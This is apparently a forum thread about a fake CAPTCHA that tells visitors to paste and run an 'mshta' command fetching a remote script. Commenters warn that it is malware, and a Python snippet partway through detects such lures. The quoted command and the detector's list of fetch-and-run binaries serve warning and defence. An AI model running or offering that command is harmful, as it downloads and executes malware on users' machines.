The text it wants me to run is the following:
mshta https://check/[dot]dasoc[dot]icu/gkcxv[dot]google?i=888x8x8x-x8xx-8888-xxx8-a00888888a1ab # Humаn, nоt а rоbоt: CAPTCHА Vеrіfісаtіоn ID: 552163’’
Looks like the site got hacked and wants me to run malware, but I’ve never seen something like this before.
That looks like the site got hacked and wants you to run malware.
Also, you might want to edit the link to change the .s in the URL to [ ] so it doesn’t linkify a likely malware link for other users.
I figured. That’s why I didn’t run it.
Not sure if you saw my edit since it was after you replied, but you might want to edit the post to change the .'s in the URL to [ ] so it doesn’t linkify a likely malware link for other users.
Done. I also changed the numbers before, but then I didn’t verify that I broke the link.
Probably just an identifier for tracking who ran it.
Nope, it is definitely malware. It put a command in your clipboard, since websites can do this, and then asks you to open a command window to run the command. This command can easily cause you to get and remotely execute an executable. Because this is so obviously dangerous, no legit site would ask you to do this.
I was referring to the ?i=number part, just like google uses si for YouTube.
Yeah, doesn’t mshta run JavaScript locally on Windows? This looks like a way to force you to run their script
I hope that URL isn’t the real one, you don’t want anyone trying it just to see what would happen
I’m curious what the script does, I’d love to reverse engineer it but don’t want to risk accidentally executing anything. Anyone with a disposable VM care to take the risk?
Possibly.
BTW, certain malware may be able to break out of a VM.
On the other hand, some malware may recognize that it is being run in a VM and do absolutely nothing to avoid analysis.
I’m sure proper malware analysts have dedicated non-virtual machines they can just format between tests.
Now I wonder if there are motherboards with easily re-flashable firmware (from a read-only device that couldn’t be tampered with).
mshta
I have no idea how somebody might come up with this braindead, unintuitive and irreproducible mnemonic for a JavaScript interpreter but it sounds very much like something Microsoft would do.
I do strongly encourage everyone to go back to pen and paper.
sort of /s but also sort of not /s
DO NOT FOLLOW THESE PROMPTS. This is a malicious prompt. It places malicious content in your clipboard and requests that you paste it into Command Prompt or PowerShell, which will infect you.
I know, but I like having the hackers on my computer, I just like the idea that someone is paying attention to me and likes the same thing I do.
You’re making the local FBI field office jealous. Lol
That’s definitely trying to hack you.
From the instructions, I would say they are trying to convince them to hack themselves (and yes, I know, that’s how 95% of hacking works… But is that only me, or is this one so obvious that it hurts?)
It’s not only you, but it definitely would fly over the heads of 95% of my co-workers.
It checks if you’re both human AND not a bumbling tumbleweed.
“A way out west there was this fella, fella I want to tell you about, fella by the name of Jeff Lebowski. At least, that was the handle his lovin’ parents gave him, but he never had much use for it himself. This Lebowski, he called himself the Dude. Now, Dude, that’s a name no one would self-apply where I come from. But then, there was a lot about the Dude that didn’t make a whole lot of sense to me. And a lot about where he lived, like-wise. But then again, maybe that’s why I found the place s’durned innarestin’.”
Highly sophisticated Darwinian CAPTCHA
deleted by creator
I did, it was that link.
And then I posted it here.
I realized and deleted it. You caught me!
The “This is either phishing or a prank, in either case, fucking don’t” type Captcha
Meanwhile me on linux be like :
Nice trick to feed your computer with a virus.
DONT DO IT. Hahahhahah
It absolutely is malware. The text you see is a comment appended to the end of a command that’ll download malicious software. The comment is placed in such a way that the command is out of frame.
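The signs described in the comments above (a command that fetches remote content, followed by a trailing comment that is the only part left in view) can be checked mechanically. This is an added example, not part of the original thread; the binary list, the lookalike map, the 40-character visible width and the sample string are constructed assumptions.

```python
import re
import unicodedata

# Binaries that fetch and run remote content. mshta is the one from this thread;
# the rest are an assumed, non-exhaustive set for illustration.
REMOTE_EXEC = {"mshta", "powershell", "pwsh", "curl", "msiexec"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
LURE_RE = re.compile(r"captcha|robot|human|verif", re.IGNORECASE)
# Partial Cyrillic-to-Latin lookalike map (constructed; not a full confusables table).
FOLD = str.maketrans("\u0430\u0435\u043e\u0456\u0441\u0410", "aeoicA")
RUN_BOX_CHARS = 40  # assumed number of characters visible in the Win+R box


def scripts(word: str) -> set[str]:
    """Unicode script names (first word of the character name) of the letters."""
    return {unicodedata.name(c, "?").split()[0] for c in word if c.isalpha()}


def analyze(pasted: str) -> set[str]:
    """Return the set of warning signs found in text a page asked the user to run."""
    findings = set()
    command, sep, comment = pasted.partition(" # ")
    tokens = command.split()
    exe = tokens[0].lower().removesuffix(".exe") if tokens else ""
    if exe in REMOTE_EXEC and URL_RE.search(command):
        findings.add("remote-exec")
    if sep:
        if any(len(scripts(w)) > 1 for w in comment.split()):
            findings.add("mixed-script-comment")
        if LURE_RE.search(comment.translate(FOLD)):
            findings.add("verification-lure")
        # Only the tail of a long string is visible after pasting into a small box.
        if exe and exe not in pasted[-RUN_BOX_CHARS:].lower():
            findings.add("command-out-of-view")
    return findings


# Constructed sample modelled on the post: placeholder host, Cyrillic lookalikes
# written as escapes so they are visible in source.
SAMPLE = ("mshta https://host.example.invalid/page?i=00000000-0000 "
          "# Hum\u0430n, n\u043et \u0430 r\u043eb\u043et: CAPTCH\u0410 "
          "V\u0435r\u0456f\u0456c\u0430t\u0456\u043en ID: 000000")
BENIGN = "ping -n 4 192.0.2.10"

if __name__ == "__main__":
    print(sorted(analyze(SAMPLE)))
    print(sorted(analyze(BENIGN)))
```

The lookalike letters mean a plain keyword search for "captcha" or "human" finds nothing in the raw string, which is why the mixed-script check and the folding step are separate from the keyword match.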
Since I use a Mac, I don’t get this joke.
Does something malicious on Windows. They can also do something similar by detecting your OS and making you run the Mac or Linux alternative.
It’s called the ‘John Hammond attack’. Even though it existed before he added his 2 cents, what you see in your image is his addition.
Watch his video to see him explain it.
Well, if it was a Richard Hammond attack, it would probably crash itself.
And have its teeth whitened
aye!!! man of culture
At 200mph
HAMMOND YOU BLITHERING IDIOT!
before he added his 2 cents
He spared no expense, huh.
Definitely malware, as everyone has already said.